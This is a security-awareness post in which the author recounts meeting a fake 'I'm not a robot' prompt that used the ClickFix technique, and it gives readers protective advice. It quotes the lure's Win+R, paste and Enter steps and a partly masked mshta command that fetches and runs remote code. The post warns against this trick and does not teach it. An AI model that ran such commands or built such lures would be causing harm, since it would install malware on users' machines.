When ‘I am Not a Robot’ Tries to Hack You

I was on a perfectly normal-looking website, having reached the page through Google Search, and I was about to read an article when a familiar box popped up: “I’m not a robot.”

So far, so good. We’ve all seen that.

But after I clicked, a second screen appeared with big bold Verification steps:

1. Press Windows Key + R
2. Press Ctrl + V
3. Press Enter

At first glance, it looks “official”, like the puzzles we get from, say, Microsoft, or many other social media sites. But read those steps carefully: a web page asking you to press the Windows key (a system shortcut), open the Run box, paste something that was not shown to you before, and execute it.

That is not human verification. That is social engineering.

The engineer in me got curious. Windows Key + R opens the Run dialog. A normal web page has no business telling you to open that. Then Ctrl + V means “paste whatever is in your clipboard”, and Enter means “run it”. Somewhere earlier in the flow, the page has quietly stuffed a command into your clipboard. Security researchers have documented entire malware campaigns built around this exact trick, usually using a Windows utility called mshta to download and run code from an attacker‑controlled website.

Instead of following the instructions, I opened Notepad and pressed Ctrl + V there. Sure enough, my clipboard contained a long command starting with something like:

mshta http://****.*****.coupons/x64

In plain English: “Run this Windows program and make it fetch and execute something from our server.” That “something” can be a password‑stealing malware, a remote‑control tool, or any nasty surprise of the attacker’s choice.

Security researchers call this the ClickFix technique. It manipulates users into copying, pasting, and running malicious commands through fake verification prompts. It is often bundled with phishing or fake brand pages to lower suspicion.

At that point, the article I wanted to read was irrelevant. I closed the browser tab, cleared recent data, and moved on. The site, or the ad network behind it, is almost certainly compromised.

What should you do?

Here are a few simple rules I want you to remember and share with your family, colleagues, and teams:

• A genuine CAPTCHA will never ask you to press Windows Key + R, open the Run dialog, or type/paste system commands. If you see that, stop immediately.
• Never execute commands you don’t fully understand—whether they arrive via a web page, email, WhatsApp forward, or “support” chat.
• If something feels odd, take a screenshot, close the tab, and ask someone you trust or your favourite AI assistant before doing anything.
• If you followed such instructions by mistake, disconnect from the internet, backup your data to an offline drive, run a full antivirus scan, and, if possible, have a professional inspect the machine.

Big Tech has trained us to mindlessly “prove we are human” all day long—clicking buses, solving tiny puzzles, doing KYC, Re‑KYC, and “quick verifications”. That conditioning is exactly what attackers are now exploiting. They wrap their tricks in familiar UI, and our brains just comply.

As founders, leaders, and builders in this post‑AI world, we have to recognise this pattern. Every “verification step” we design teaches users a habit—good or bad. If we don’t think through the unintended consequences, someone else will weaponise those habits against our users.

For now, if you see a CAPTCHA that asks you to press Windows + R, paste, and hit Enter, treat it like a live wire. Close it. Walk away. Your data, and your peace of mind, are worth far more than whatever was on that page.